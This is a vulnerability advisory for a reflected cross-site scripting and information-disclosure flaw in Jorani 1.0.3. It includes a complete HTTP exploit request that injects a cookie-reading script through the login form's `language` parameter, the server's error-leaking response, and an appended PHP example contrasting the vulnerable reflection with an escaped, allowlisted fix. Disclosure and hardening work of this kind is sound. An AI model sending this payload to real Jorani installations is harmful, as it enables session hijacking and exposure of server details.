Jorani 1.0.3 Cross Site Scripting

Jorani version 1.0.3 suffers from a cross site scripting vulnerability.
## Title: Jorani-v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure
## Author: nu11secur1ty
## Date: 08/27/2023
## Vendor: https://jorani.org/
## Software: https://demo.jorani.org/session/login
## Reference: https://portswigger.net/web-security/cross-site-scripting
## Reference: https://portswigger.net/web-security/information-disclosure

## Description:
The value of the `language` request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload `75943";alert(1)//569` was submitted in the `language` parameter. This input was echoed unmodified in the application's response. An attacker can modify the session token and can discover sensitive information about the server.

STATUS: HIGH-Vulnerability

[+]Exploit:

```http
POST /session/login HTTP/1.1
Host: demo.jorani.org
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK
Origin: http://demo.jorani.org
Upgrade-Insecure-Requests: 1
Referer: http://demo.jorani.org/session/login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 183

csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=
```

[+]Response:

```http
HTTP/1.1 200 OK
date: Sun, 27 Aug 2023 06:03:04 GMT
content-type: text/html; charset=UTF-8
Content-Length: 681
server: Apache
x-powered-by: PHP/8.2
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; SameSite=Strict
set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly; SameSite=Lax
last-modified: Sun, 27 Aug 2023 06:03:04 GMT
vary: Accept-Encoding
cache-control: private, no-cache, no-store, proxy-revalidate, no-transform, must-revalidate
pragma: no-cache
x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1
x-iplb-instance: 27474
connection: close

<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
<h4>A PHP Error was encountered</h4>
<p>Severity: 8192</p>
<p>Message: strlen(): Passing null to parameter #1 ($string) of type string is deprecated</p>
<p>Filename: controllers/Connection.php</p>
<p>Line Number: 126</p>
</div>
<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
<h4>A PHP Error was encountered</h4>
<p>Severity: Warning</p>
<p>Message: Cannot modify header information - headers already sent by (output started at /home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p>
<p>Filename: helpers/url_helper.php</p>
<p>Line Number: 565</p>
</div>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)

## Time spent:
01:35:00
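The JavaScript-string context from the description above, as an added defender-side example that is not Jorani's code: a hypothetical PHP handler that reflects the `language` parameter into a double-quoted JS string unsafely, beside a hardened version that allowlists the locale and hex-escapes the value before embedding it. The allowlist, function names and sample input are assumptions constructed for this example.

```php
<?php
// Added example, not Jorani's code: hardening a locale parameter that is
// reflected into a JavaScript string inside a double-quoted literal.

// Constructed allowlist (assumption); a real application would derive it
// from the language files it actually ships.
const ALLOWED_LANGUAGES = ['en-GB', 'en-US', 'fr-FR', 'de-DE'];

// Vulnerable pattern: the raw request value is concatenated into a
// double-quoted JS string, so a value containing `";` or `</script>`
// terminates the string (or the script element) and the remainder is
// interpreted as markup or script by the browser.
function renderLanguageVulnerable(string $language): string
{
    return '<script>var lang = "' . $language . '";</script>';
}

// Hardened step 1: accept only a known locale; anything else, including a
// missing parameter, falls back to the default instead of being echoed.
function normalizeLanguage(?string $language, string $default = 'en-GB'): string
{
    if ($language === null || !in_array($language, ALLOWED_LANGUAGES, true)) {
        return $default;
    }
    return $language;
}

// Hardened step 2: emit the (already allowlisted) value through json_encode
// with the JSON_HEX_* flags, so `<`, `>`, `&`, `'` and `"` become \uXXXX
// escapes and cannot close the string or the <script> element.
function renderLanguageSafe(?string $language): string
{
    $encoded = json_encode(
        normalizeLanguage($language),
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    return '<script>var lang = ' . $encoded . ';</script>';
}

// Constructed sample input shaped like the advisory's payload: a valid
// locale prefix followed by characters that break out of the JS string.
$input = 'en-GB"><script>alert(document.cookie)</script>';

echo renderLanguageVulnerable($input), PHP_EOL; // input reflected unchanged
echo renderLanguageSafe($input), PHP_EOL;       // falls back to the default locale

// Typical request-handling use: `?? null` covers an absent parameter.
echo renderLanguageSafe($_POST['language'] ?? null), PHP_EOL;
```

The second PHP notice in the advisory's response (a filename and line number rendered into the page) is separate from the injection itself: in production, `display_errors` should be off so such paths are logged rather than returned to the client.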